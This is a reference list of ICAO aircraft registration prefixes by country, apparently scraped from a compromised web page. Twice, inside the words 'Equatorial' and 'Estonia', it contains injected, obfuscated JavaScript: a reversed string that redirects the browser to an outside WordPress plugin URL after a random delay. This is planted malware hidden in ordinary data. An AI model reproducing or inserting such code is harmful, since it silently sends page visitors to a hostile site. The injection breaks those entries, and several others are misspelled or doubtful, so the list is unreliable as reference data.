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ICAO Aircraft Registration Prefixes

YA- Afghanistan
ZA- Albania
7T- Algeria
C3- Andorra
D2- Angola
VP-A Anguilla
V2- Antigua
LV- Argentina
LQ- Argentina (Government)
EK- Armenia
P4- Aruba
VH- Australia
OE- Austria
4K- Azerbaijan
C6- Bahamas
A9C- Bahrain
S2- Bangladesh
S3- Bangladesh
8P- Barbados
EW- Belarus
OO- Belgium
V3- Belize
TY- Benin
VP-B Bermuda
A5- Bhutan
CP- Bolivia
T9- Bosnia Hercegovina
A2- Botswana
PP- Brazil
PR- Brazil
PT- Brazil
VP-LV British Virgin Islands
V8- Brunei
LZ- Bulgaria
XT- Burkina Faso
9U- Burundi
TJ- Cameroon
C- Canada
D4- Cape Verde Islands
VP-C Caymen Islands
TL- Central African Republic
TT- Chad
CC- Chile
B- China
CX Christmas Islands
HK- Colombia
D6- Comores
TN- Congo
TI- Costa Rica
TU- Cote D’Ivoire
9A- Croatia
CU- Cuba
5B- Cyprus
OK- Czech Republic
OY- Denmark
J2- Djibouti
J7- Dominica
HI- Dominican Republic
HC- Ecuador
SU- Egypt
YS- El Salvador
3C- Equatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torial Guinea
E3- Eritrea
ES- Estoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonia
ET- Ethiopia
VP-F Falkland Islands
DQ- Fiji
K-S Finland
OH- Finland
F- France
TR- Gabon
4L- Georgia
D- Germany
9G- Ghana
SX- Greece
GL- Greenland
J3- Grenada
F-OG Guadeloupe
TG- Guatemala
3X- Guinea
J5- Guinea Bissau
8R- Guyana
HH- Haiti
HR- Honduras
B-H, B-K, B-L Hong Kong, China
HA- Hungary
TF- Iceland
VT- India
PK- Indonesia
EP- Iran
YI- Iraq
EI- Ireland
4X- Israel
I- Italy
6Y- Jamaica
JA Japan
JY- Jordan
XU- Kampuchea
UN- Kazakhstan
5Y- Kenya
T3- Kiribati
P- Korea, Dem. People’s Rep. of
HL Korea, Rep. of
9K- Kuwait
EX- Kyrgyzstan
YL- Latvia
OD- Lebanon
7P- Lesotho
EL- Liberia
5A- Libya
LY- Lithuania
LX- Luxembourg
B-M Macau
Z3- Macedonia
5R- Madagascar
7Q- Malawi
9M- Malaysia
8Q- Maldives
TZ- Mali
9H- Malta
V7- Marshall Islands
F-OG Martinique
5T- Mauritania
3B- Mauritius
XA- Mexico
XB- Mexico
XC- Mexico
ER- Moldova, Rep. of
3A- Monaco
MT- Mongolia
VP-LMA-LUZ Montserrat
CN- Morocco
C9- Mozambique
XY- Myanmar
XZ- Myanmar
V5- Nambia
C2- Naura
PJ- Nehterlands Antilles
9N- Nepal
PH- Netherlands
F-OD New Caledonia
ZK- New Zealand
ZL- New Zealand
YN- Nicaragua
5U- Niger
5N- Nigeria
LN- Norway
A40- Oman
AP- Pakistan
HP- Panama
P2- Papua New Guinea
ZP- Paraguay
OB- Peru
RP- Philippines
SP- Poland
CS- Portugal
A7- Qatar
F-O Reunion Island
YR- Romania
RA- Russian Federation
9XR- Rwanda
5W- Samoa
T7- San Marino
S9- Sao Tome and Principe
HZ- Saudi Arabia
6V- Senegal
6W- Senegal
S7- Seychelles
9L- Sierra Leone
9V- Singapore
OM- Slovakia
S5- Slovenia
H4- Solomon Islands
6O- Somalia
ZS- South Africa
ZT- South Africa
ZU- South Africa
EC- Spain
4R- Sri Lanka
VQ-H St. Helena
V4- St. Kitts and Nevis
J6- St. Lucia
J8- St. Vincent and Grenadines
ST- Sudan
PZ- Suriname
3D- Swaziland
SE- Sweden
HB- Switzerland
YK- Syria
F-OH Tahiti
B- Taiwan
EY- Tajikistan
5H- Tanzania
HS- Thailand
C5- The Gambia
5V- Togo
A3- Tonga
9Y- Trinidad and Tobago
TS- Tunisia
TC- Turkey
EZ- Turkmenistan
VQ-T Turks and Caicos Islands
5X- Uganda
A6- United Arab Emirates
G- United Kingdom
N United States of America
UR- Urkraine
CX- Uruguay
UK- Uzbekistan
YJ- Vanuatu
HV- Vatican City
YV- Venezuela
VN- Vietnam
7O- Yemen
YU- Yugoslavia
9Q- Zaire
9J- Zambia
Z- Zimbabwe